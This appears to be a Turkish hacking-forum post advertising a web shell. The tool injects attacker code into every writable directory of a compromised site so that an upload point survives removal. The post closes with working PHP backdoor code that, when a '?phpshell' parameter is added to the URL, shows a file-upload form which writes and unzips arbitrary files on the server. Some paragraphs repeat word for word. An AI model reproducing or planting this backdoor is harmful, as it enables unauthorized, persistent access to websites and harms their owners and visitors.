Merhaba arkadaşlar, piyasa da bilinmeyen yeni bir shell ile karşınızdayız. Hack ile uğraşanların çok muzdarip olduğu bir konu olan shellerinin hemen silinmesidir. Biz de buna bir yol bulmak için bu paylaşacağımız shell ile silinse bile sizlere alternatif bir yükleme noktası oluşturacak, sitenin yazma izni olan tüm dizinlerine kodunuzu enjekte ederek size yardımcı olacaktır. Görseller ile daha iyi anlayacaksınızdır.
Kutucuk içine siteye enjekte etmek istediğiniz kodları yapıştırın (gerekli kodlar aşağıda) ve “Do It”e basın.
Bastıktan sonra kodunuzun hangi dizinlere yazıldığını görebileceksiniz.
Deneme amaçlı olarak da sizlere göstermek için yukarıda yazan zone.php’nin sonuna zone.php?phpshell yazdığımız da dosya yükleme noktası açılacaktır.
Kutucuk içine siteye enjekte etmek istediğiniz kodları yapıştırın (gerekli kodlar aşağıda) ve “Do It”e basın.
Bastıktan sonra kodunuzun hangi dizinlere yazıldığını görebileceksiniz.
Deneme amaçlı olarak da sizlere göstermek için yukarıda yazan zone.php’nin sonuna zone.php?phpshell yazdığımız da dosya yükleme noktası açılacaktır.
Code:
<?php
if(isset($_GET["phpshell"])){
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
$file = $_FILES['file']['name'];
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
$zip = new ZipArchive;
if ($zip->open($file) === TRUE) {
$zip->extractTo('./');
$zip->close();
echo 'Yükleme Başarılı';
} else {
echo 'Yüklenmedi.';
}
}else{
echo '<b>Basarisiz</b><br><br>';
}
}
}
?>
